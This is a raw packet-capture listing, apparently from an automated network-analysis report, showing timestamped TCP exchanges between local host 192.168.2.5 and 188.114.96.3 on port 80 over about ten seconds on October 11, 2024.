                                                                Oct 11, 2024 01:37:12.983264923 CEST8050052188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.269243002 CEST5005180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.274719954 CEST8050051188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.274930954 CEST8050051188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.331912041 CEST5005280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.336899996 CEST8050052188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.336997986 CEST8050052188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.337027073 CEST8050052188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.382528067 CEST8050051188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.422671080 CEST8050052188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.425410032 CEST5005180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.472352982 CEST5005280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.788630962 CEST8050051188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.788744926 CEST8050052188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.831633091 CEST5005180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.831883907 CEST5005280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.894743919 CEST5005280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.895062923 CEST5005180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.895190954 CEST5005280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.899597883 CEST8050052188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.900182009 CEST8050051188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.900228024 CEST5005180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.900755882 CEST8050052188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.900805950 CEST5005280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.905359030 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.910173893 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:13.912364006 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.912460089 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:13.917167902 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.004239082 CEST5005480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.009253025 CEST8050054188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.013688087 CEST5005480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.013930082 CEST5005480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.018695116 CEST8050054188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.269705057 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.275075912 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.275088072 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.275173903 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.363207102 CEST5005480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.365849018 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.369076014 CEST8050054188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.369690895 CEST8050054188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.409857988 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.479382038 CEST8050054188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.519117117 CEST5005480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.627578020 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.628035069 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.633219957 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.723720074 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.723887920 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.727463007 CEST8050054188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.728702068 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.750268936 CEST5005480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.750788927 CEST5005580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.755510092 CEST8050054188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.755599022 CEST5005480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.755624056 CEST8050055188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.755779028 CEST5005580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.755824089 CEST5005580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.760565996 CEST8050055188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.980346918 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:14.980745077 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:14.985564947 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.096713066 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.096890926 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.101731062 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.101799011 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.113239050 CEST5005580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.118208885 CEST8050055188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.118262053 CEST8050055188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.118271112 CEST8050055188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.204046965 CEST8050055188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.253513098 CEST5005580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.402214050 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.452141047 CEST8050055188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.456736088 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.503747940 CEST5005580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.530723095 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.581726074 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.600606918 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.605601072 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.674590111 CEST5005580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.674911022 CEST5005680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.680074930 CEST8050056188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.680171967 CEST5005680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.680226088 CEST8050055188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.680435896 CEST5005580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.696588993 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.696662903 CEST5005680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.696751118 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:15.701531887 CEST8050056188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.701668978 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.701987028 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:15.702016115 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.033489943 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.033894062 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.038959980 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.050628901 CEST5005680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.056029081 CEST8050056188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.056361914 CEST8050056188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.130111933 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.130283117 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.135200977 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.135232925 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.135261059 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.230042934 CEST8050056188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.284845114 CEST5005680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.386368990 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.441016912 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.479624033 CEST8050056188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.497982979 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.498079062 CEST5005680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.498775959 CEST5005780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.503997087 CEST8050057188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.504112959 CEST5005780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.504164934 CEST8050053188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.504175901 CEST8050056188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.504198074 CEST5005780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.504213095 CEST5005380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.504241943 CEST5005680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.509147882 CEST8050057188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.583461046 CEST5005880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.588494062 CEST8050058188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.588612080 CEST5005880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.588973999 CEST5005880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.593849897 CEST8050058188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.862927914 CEST5005780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.868745089 CEST8050057188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.868782997 CEST8050057188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.868812084 CEST8050057188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.941160917 CEST5005880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:16.946335077 CEST8050058188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.946413994 CEST8050058188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:16.968772888 CEST8050057188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.019187927 CEST5005780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.224330902 CEST8050058188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.224406958 CEST8050057188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.224456072 CEST8050057188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.224457979 CEST5005780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.224467039 CEST8050058188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.224513054 CEST5005880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.269707918 CEST5005780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.332432985 CEST5005880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.333267927 CEST5005980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.337708950 CEST8050058188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.337816000 CEST5005880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.338124037 CEST8050059188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.338211060 CEST5005980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.338349104 CEST5005980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.343148947 CEST8050059188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.343425989 CEST5005780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.345268965 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.351437092 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.351511955 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.351584911 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.356342077 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.691155910 CEST5005980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.696567059 CEST8050059188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.696609020 CEST8050059188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.706702948 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.711785078 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.711852074 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.711903095 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.794100046 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.802850962 CEST8050059188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:17.847218037 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:17.849616051 CEST5005980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.047070026 CEST8050059188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.083966970 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.097223997 CEST5005980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.128551006 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.160830021 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.165800095 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.211961031 CEST5006180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.217176914 CEST8050061188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.217269897 CEST5006180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.217456102 CEST5006180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.222282887 CEST8050061188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.254597902 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.254918098 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.259856939 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.260128021 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.549751043 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.566171885 CEST5006180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.572593927 CEST8050061188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.572686911 CEST8050061188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.572715998 CEST8050061188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.597192049 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.664824963 CEST8050061188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.666115046 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.671435118 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.706722975 CEST5006180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.760725975 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.760927916 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:18.766700983 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.767314911 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.921839952 CEST8050061188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:18.972223997 CEST5006180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.046526909 CEST5006180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.047178030 CEST5006280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.052129984 CEST8050062188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.052205086 CEST5006280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.052315950 CEST8050061188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.052320957 CEST5006280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.052370071 CEST5006180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.056296110 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.057219982 CEST8050062188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.097188950 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.160331011 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.165431976 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.254532099 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.254708052 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.259675980 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.259705067 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.409821987 CEST5006280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.414818048 CEST8050062188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.414835930 CEST8050062188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.414845943 CEST8050062188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.526020050 CEST8050062188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.556806087 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.581559896 CEST5006280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.612888098 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.660137892 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.664984941 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.754437923 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.754602909 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.759480953 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.759571075 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.772439957 CEST8050062188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.815948963 CEST5006280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.890258074 CEST5006280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.890894890 CEST5006380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.896321058 CEST8050063188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.896403074 CEST8050062188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:19.896437883 CEST5006380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.896471977 CEST5006280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.896559000 CEST5006380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:19.901844025 CEST8050063188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.056318998 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.097168922 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.160743952 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.165649891 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.253757954 CEST5006380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.254996061 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.255131960 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.258737087 CEST8050063188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.258747101 CEST8050063188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.258822918 CEST8050063188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.259912014 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.260098934 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.341378927 CEST8050063188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.394066095 CEST5006380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.548269033 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.586076975 CEST8050063188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.597155094 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.628555059 CEST5006380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.660379887 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.660450935 CEST5005980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.665667057 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.669025898 CEST8050059188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.669118881 CEST5005980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.702739000 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.703414917 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.708714008 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.708755970 CEST8050060188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.708833933 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.708848000 CEST5006080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.709003925 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:20.713864088 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:20.817002058 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.066504002 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.112833023 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.425285101 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.829632998 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.829725027 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.829889059 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.830234051 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.830286980 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.831638098 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.831965923 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.831999063 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.832084894 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.832093000 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.832251072 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.832828045 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.832856894 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.832885027 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.833159924 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.836467028 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.837954044 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.838015079 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:21.838351011 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.838696003 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:21.838726044 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.193170071 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:22.193816900 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.194330931 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:22.198285103 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.198564053 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.199438095 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.280930996 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.289119959 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.289330959 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:22.294656038 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.331770897 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:22.534554958 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.535161018 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:22.540388107 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.565748930 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.612957954 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:22.630389929 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.630724907 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:22.636161089 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.636200905 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.636230946 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.675964117 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:22.681540966 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.771692991 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.771972895 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:22.777324915 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.778098106 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.938079119 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:22.938719034 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:22.943944931 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.033759117 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.034075022 CEST5006480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.040199041 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.040239096 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.040273905 CEST8050064188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.060278893 CEST5006380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.073539019 CEST8050065188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:23.128653049 CEST5006580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:23.175762892 CEST5006580192.168.2.5188.114.96.3
